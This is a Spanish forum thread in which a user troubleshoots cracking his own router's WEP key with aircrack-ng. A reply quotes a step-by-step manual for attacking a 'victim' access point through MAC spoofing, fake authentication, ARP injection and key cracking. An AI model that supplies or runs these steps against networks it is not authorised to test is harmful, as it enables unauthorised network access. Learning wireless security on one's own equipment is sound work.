?>/script>'; } ?> Al final no entiendo que hago mal Widgets Magazine
« anterior próximo »
Páginas: [1]   Ir Abajo

Autor Tema: Al final no entiendo que hago mal  (Leído 3028 veces)

0 Usuarios y 1 Visitante están viendo este tema.

fdogr

  • Visitante
Al final no entiendo que hago mal
« en: 13-03-2008, 19:41 (Jueves) »
Bueno, pues eso, que algo hago mal y no se que. Me explico:
Se trata de intentar hallar la clave de mi router. El motivo, aprender mas que otra cosa.
Vamos a ver, empiezo por usar airmon para poner modo monitor

airmon-ng start wifi0

(no se si se permiten poner capturas de pantalla, si los moderadores lo permiten editare el mensaje dentro de un par de dias y capturo pantallas con todo el proceso)

Se me crean ath0 managed y ath1 monitor

Previniendo un posible ataque de autentificacion falso (perdon si la denominacion no es del todo correcta)

ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Arranco airodump directamente en el canal 6 o bien empiezo por kismet. si hago esto ultimo lo apago antes del airodump

airodump-ng --ivs -w casa -c 6 ath1

Arranca perfectamente y aparecen varias redes ademas de mi router. Entre ellas una tal prove network y en ocasiones otra con el ssid lengt:0

intento el ataque 1, si uso ath0 no funciona, si uso ath1 me aparece como conectado con 00:11:22:33:44:55 uso el parametro 30 porque sino se desconecta al cabo de un rato


aireplay-ng -1 30 -e adslxxxx -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55

Aparece como connection sucesfull (mas o menos)

Entonces intento inyectar

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55

Hace unos dias se conecto bien pero en media hora no consegui mas que 3 arp y unos 800 datas, no se si hice algo diferente, ahora cuando intento conectar si lo hago con ath0 me da un mensaje de error y si lo hago con ath1 funciona pero recibe paquetes pero ni envia ni recibe arp.

uso back track 2 la verdad es que he probado wifislax y wifiway pero me resulta bastante dificil acostumbrarme, como comentario con wifislax tengo problemas para configurar el modo grafico a mas definicion de 640*480 y wifiway (que por cierto me encanta, felicitaciones a sus creadores) me encuentro un poco perdido, supongo que sera cuestion de tiempo para acostumbrarme a encontrar las herramientas a usar.

En línea

MMRX

  • Visitante
Re: Al final no entiendo que hago mal
« Respuesta #1 en: 13-03-2008, 20:32 (Jueves) »
Bueno te comento mi experiencia, yo uso wifiway y concretamente airoway.sh que me parece bastante más comodo. Muchas veces me autentifico con exito, recivo 1,2,3....10..20 ARPs y los datas no suben. En mi mismo AP, lo intento otro dia y quizas lo mismo, lo hago un 3º y ya inyecta, esto no es una ciencia exacta depende mucho del tipo de router y de más cosas, si tienes oportunidad pruebalo con el AP de algun amigo o familiar, quizas con esos tengas más suerte.

Por cierto los de Length:0 y segun mi experiencia tambien, son los que tienen el ESSID oculto, como es mi caso, aunque en cuanto me asocio con la PDA aparece, pero en fin :)

Suerte

En línea

fdogr

  • Visitante
Re: Al final no entiendo que hago mal
« Respuesta #2 en: 13-03-2008, 22:06 (Jueves) »
Gracias compañero, en principio lo he intentado con los dos router que tengo, ambos de la misma marca, pero por lo que entiendo no hago nada mal, en principio, en fin no se.  Por lo poco que se, que no me funcionen los ataque con el aireplay es bastante normal porque en principio, debe emitir por el ath0 (el que esta como managed) pero ese no me admite el comando y si lo hago desde ath1 como esta en monitor, en teoria no emite, por lo tanto... o es que me hago un lio. En fin, seguire experimentando.

En línea

fdogr

  • Visitante
Re: Al final no entiendo que hago mal
« Respuesta #3 en: 18-03-2008, 00:52 (Martes) »
Oye, no apabullar con tantas respuestas que no me da tiempo a leerlas todas
 :D :D

En línea

JosePromesa

  • Visitante
Re: Al final no entiendo que hago mal
« Respuesta #4 en: 18-03-2008, 00:57 (Martes) »
Qué tarjeta usas? Depende de la tarjeta que uses la interfaz sera una u otra

He aquí un buen manual, gracias a Alexelprogramador:

Cita de: alexelprogramador en 05-12-2007, 04:18 (Miércoles)

minimanual aircrack-ng made in alexelprogramador   ;)

Citar

la prime: enchufas el pc y el bosslan 500 con una antena decente omni de unos 8dbi todo ello pillado en comprawifi por ejemplo...

inicias wifiway o wifislax.

ordenes (estan ordenados por la que deberias de empezar, primero pones airmon-ng luego airodump-ng etc)

airmon-ng  --->es para iniciar el dispositivo bosslan en modo monitor
airodump-ng -->vale para capturar paquetes.
aireplay-ng -->sirve para inyectar paquetes y por tanto capturas más rapidamente.
aircrack-ng --->es para obtener la clave una vez que has capturado unos buenos cuantos paquetes "digamos unos 100.000"

ejemplos:

bssid de ap victima: 11:22:33:44:55:66 (son 6 los numeros en hexadecimal)
bssid que quiero inyectar para atacar el ap victima: 00:00:00:00:00:00  (son 6 en total)
essid del ap victima: TONTO
interfaz del dispositivo atacante: wlan0 "es un cero patatero ojo no una O de Omega"
canal en el que modula: por ejemplo vamos a escojer el canal 4

primera orden=
airmon-ng start wlan0   (mode monitor enabled)
airodump-ng wlan0  ----->(aqui mira el ap que quieres atacar, copia si bssid y creas un fichero de texto, pega su bssid ahi dentro para luego usarlo despues, tambien fijate en el canal en el que modula, por ejemplo nuestra victima modula en el canal 4)

una vez sabida la victima que quieres atacar haces esto:


airodump-ng --bssid 11:22:33:44:55:66 -c4 -w capturas wlan0  (quiere decir, captura paquetes solamente que vengan desde el bssid 11:22:33:44:55:66  que estén en el canal 4 "-c4" y guardalos en un archivo que se llama capturas "-w capturas)Nota: Hazlo en una shell y no la cierres


aireplay-ng -e TONTO -a 11:22:33:44:55:66  -h 00:00:00:00:00:00 -1 30 wlan0  (haz un ataque de falsa autentificacion a una red la cual tenga como essid TONTO "-e TONTO" y hazlo cada 30 segundos "-1 30 ") Lo demas por intuicion lo sabes. OJO No cierres esta orden, dejala en una shell aparte.
Notarás que aireplay-ng ha hecho efecto cuando leas asociation succesfull ;-)

aireplay-ng -b 11:22:33:44:55:66  -h 00:00:00:00:00:00 -3 wlan0  (con esto inyectas paquetes con el trafico generado en el ataque por falsa autentificacion) OOOJOO: hazlo en otra shell, en total debes tener 3 shell abiertas y funcionando con cada orden

al cabo de unos minutos verás que la parte de DATAS subirá rapidamente. cuando tengas unos 100.000 y puede que menos haces esto:

aircrack-ng -z capturas*.cap  (con el -z le estoy diciendo al aircrack-ng que haga el algoritmo extraido del programa aircrack-ptw, lo que quiere decir que haga lo mismo que el aircrack-ptw)


y he ahi la clave   ;) ;) ;)


Saludos !!!

En línea

fdogr

  • Visitante
Re: Al final no entiendo que hago mal
« Respuesta #5 en: 21-03-2008, 15:49 (Viernes) »
Gracias, la tarjeta es atheros y en principio funciona, incluso bajo win que tambien lo probe.
Voy a probar a leer ese manual a ver si me aclara algo. De todas las maneras llevo 4-5 dias que lo deje un poco de lado, necesitaba despejar un poco la mente. Ahora ya vuelvo a estar en la brecha.
Salu2

En línea
Páginas: [1]   Ir Arriba
« anterior próximo »
 

Si quieres tener la mejor experiencia posible de navegación y uso de la web activa y acepta nuestras políticas de privacidad y cookies. En caso contrario te recomendamos abandonar la web y buscar la información en otro sitio. Si quieres registrarte en el foro deberás aceptar las políticas de privacidad y las condiciones de uso. Learn more